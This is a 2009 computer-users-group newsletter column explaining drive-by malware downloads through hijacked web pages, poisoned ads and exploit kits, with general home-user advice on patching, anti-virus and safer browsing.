Sarasota PC Monitor

Tech Talk (09/07)

Drive-by Infections
by Brian K. Lewis, Ph.D.*
Member of the Sarasota Personal Computer Users Group, Inc.

How safe do you feel when surfing the web? As a savvy computer user you no doubt keep your computer safe while browsing the web through the use of anti-virus software, firewall software, anti-spyware, etc. These anti-malware applications will protect your computer from dangerous software that can be transferred to your computer by some active means or a "Push" from another source. However, are you aware that your computer can "Pull" malware from a Website without your knowledge or active intervention? Such malware can get through all of your active defenses because it is part of the Web page you are downloading and may appear safe to all of your defenses!

Many people think that they couldn’t possibly get malware from the Websites they visit because they are all very respectable businesses. Unfortunately, it seems that any Website can become a host to malware. Google has used its Web indexing system to systematically look for malicious Websites over a twelve month period. (The Ghost in the Browser – Niels Provos, et. al., Google, Inc.) At least 10% of the 4.5 million sites they had checked, by the time of publication, have "drive-by" downloads. Over 700,000 additional sites have other malware associated with them. So what is a drive-by download? It is the transfer of malware which occurs without any action on the part of the viewer other than the download of the Web page. Just remember you can’t see any Web page until the code that produces it has been transferred to your computer’s memory and then, put up on your video screen.

Usually, most of a Website’s content is created by the Website owner. However, as more and more Websites are supported by advertising, they may also display ads from third-party advertising networks. These ads are usually connected to the Web page via external Javascript or iframes. (see the May 2008 issue of the SPCUG Monitor for more on iframes.) Moreover, some sites allow users to contribute their own content, for example via postings to forums or blogs. Depending on the individual site’s policies, user contributed content may be restricted to text files, but it often can also contain HTML code (Hyper Text Markup Language) which provides links to images or other external content. HTML is the language used to write web page code. Web pages also may have third-party content such as visitor counters or complex calendars. In Google’s research paper they cite a number of examples of code which can be hidden in a Web page. In some cases it can be a simple JavaScript program that redirects the viewer to an entirely different Web page. One example cited was a visitor counter which had its code revised to include a command to change the Web site being viewed. This was inserted some three years after the page was originally published. You might think that changing the page you are viewing would be very obvious in the address line of your browser. However, the info in the address line is not the true address, which is always given by a series of numbers. What you see is a converted name or nickname. So the address shown in the browser can be readily "spoofed" as part of the page redirection by the malware code.

The drive-by download uses the browser (Internet Explorer, Firefox, Safari, Opera, etc) as the mechanism to connect computer users to Web servers rigged with malware code. In the drive-by attack, the malware program is automatically downloaded to your computer without your consent or even your knowledge. The attack actually occurs in two steps. The user surfs to a Website that has been rigged with code that in turn redirects the connection to a malicious third-party server hosting malware code. These codes can target vulnerabilities in the Web browser, an unpatched browser plug-in, a vulnerable ActiveX control, or any other third party software flaws such as that found in unpatched Adobe Readers.

One example of a problem which might make a user vulnerable to malware is contained in this Microsoft Security Bulletin 03-011. Here is the pertinent quotation from this bulletin.

"In order to exploit this vulnerability via the Web-based attack vector, the attacker would need to entice the user into visiting a site the attacker controlled. The vulnerability itself provides no way to force a user to a Website."

However, if a script redirects the user’s browser without his/her knowledge and the attacker’s Website then exploits a known vulnerability in the operating system, it is hardly the user’s fault. However if a patch for the specific "hole" is available, but hasn’t been installed, then you can certainly blame the user. It is an accepted fact that many, possibly as many as 65% of users do not install the updates to their operating systems. This, in spite of the fact that Microsoft sets automatic downloads and installs as the default method for updating both Windows XP and Vista.

Another real world example of a drive-by download involved the Website for the Miami Dolphins. In 2007, before the Super Bowl, one line was inserted into the HTML code for the Dolphin’s Website that was designed to cause a transfer to a third party site. A visitor to the Dolphin site, with an unpatched Windows computer, was silently connected to a remote third party that attempted to exploit known vulnerabilities described by Microsoft’s MS06-014 and MS07-004 security bulletins. (Note that the 06 and 07 indicate the year the bulletin was issued.) If the exploit was successful, a Trojan was silently installed that gave the attacker full access to the compromised computer. The attacker could later take advantage of the compromised computer in order to steal confidential information or to launch Denial of Service (DoS) attacks.

Another example of drive-by malware is that found on "poisoned" advertising sites. More and more advertising is appearing on every Website. Users who click on ads may be directed to servers which have been "poisoned" and end up on servers which contain a host of drive-by malware. Another link to malware sites has been shown to be sites selected by certain keywords during Internet searches. For example, the top results of any search containing the word "screensaver" had a 59% chance of including a malware site according to a report published by McAfee (The Webs Most Dangerous Search Terms.) If the search included the term "lyrics" the results had a 25% chance of being malware sites or one out of every four results. This was followed closely by the term "free".

Malware "kits" serve as the engine for drive-by downloads. These kits are professionally written software that can be hosted on a server with a database backend. The kits, which are sold on underground hacker sites, are fitted with exploits for vulnerabilities in a range of widely deployed desktop applications, including Apple’s QuickTime media player, Adobe Flash Player, Adobe Reader, RealNetworks’ RealPlayer, and WinZip. Identity thieves and other malware authors purchase these code kits and deploy them on a malicious server. Code is then embedded on Web sites to redirect traffic to that malicious server. Additionally, lures to those sites are spammed via e-mail or bulletin boards . These kits can also be designed to determine which browser and operating system are being used and their versions. That way a tailored malware application, or applications, can be used to exploit all the possible vulnerabilities. They can also determine the third-party software being used and tailor the response to its vulnerabilities.

The lesson from all this says that it is very important for computer users to install the security patches that Microsoft makes available. Many of the exploits identified by various security organizations are related to holes that were patched months and years ago. The problem being that many businesses and individuals do not stay up to date on the installation of these patches. So here are a few ways you can try to protect your computer from drive-by downloads:

  1. Use a patch management solution that assists with finding – and fixing – all third party desktop applications. Just one example: Secunia offers two tools – Personal Software Inspector and Network Security Inspector – that can help identify unpatched applications.

  2. Use a desktop browser that includes anti-phishing and anti-malware blockers. Microsoft’s Internet Explorer, Mozilla Firefox, and Opera all provide security features to block malicious sites. However, you should be using the latest versions to get the protection.

  3. Enable a firewall and apply all Microsoft operating system updates. Avoid using pirated software which has its updates disabled through Windows Genuine Advantage (WGA). Although Microsoft has stated that all Windows software receives security updates.

  4. Install anti-virus/anti-malware software and be sure to keep its databases updated. Make sure your anti-virus provider is using a browser traffic scanner (such as Avast) to help pinpoint potential problems from drive-by downloads. If your A/V scanner has a web scanner function and you haven’t activated it, do it now.

There is an additional safeguard which most Windows users ignore. You should never surf the Internet while you are running your computer as the Administrator. You should always set up a User account for this purpose. In addition, both the User account and the Administrator account should be password protected. This does not guarantee that you will be protected from "zero-day" exploits, those which have not been patched, but it will reduce the possibility of such events.

Last but not least, you can do your surfing from a sandbox. Check out my article on Sandbox Computing in the January 2009 SPCUG Monitor.

Always be aware that someone out there is trying to redirect your computer to a malware site and keep your defenses up.

*Dr. Lewis is a former university and medical school professor of physiology. He has been working with personal computers for over thirty years, developing software and assembling systems. He can be reached at bwsail at yahoo.com.

Return to Brian Lewis' Index

Return to Columnist's Index

Copyright 2009. This article is from the July 2009 issue of the Sarasota PC Monitor, the official monthly publication of the Sarasota Personal Computer Users Group, Inc., P.O. Box 15889, Sarasota, FL 34277-1889. Permission to reprint is granted only to other non-profit computer user groups, provided proper credit is given to the author and our publication. We would appreciate receiving a copy of the publication the reprint appears in, please send to above address, Attn: Editor. For further information about our group, email: admin@spcug.org// Web: http://www.spcug.org/ 

The Sarasota Personal Computer Users Group, Inc. has 1,100+ members and was established in 1982. We are members of the Assoc. of PC User Groups (APCUG), the Florida Assoc. of PC Users Groups, Inc., and we are members of the America Online Ambassador Program.

See http://www.spcug.org for all reviews from the Sarasota PC Monitor, go to the Newsletter Section.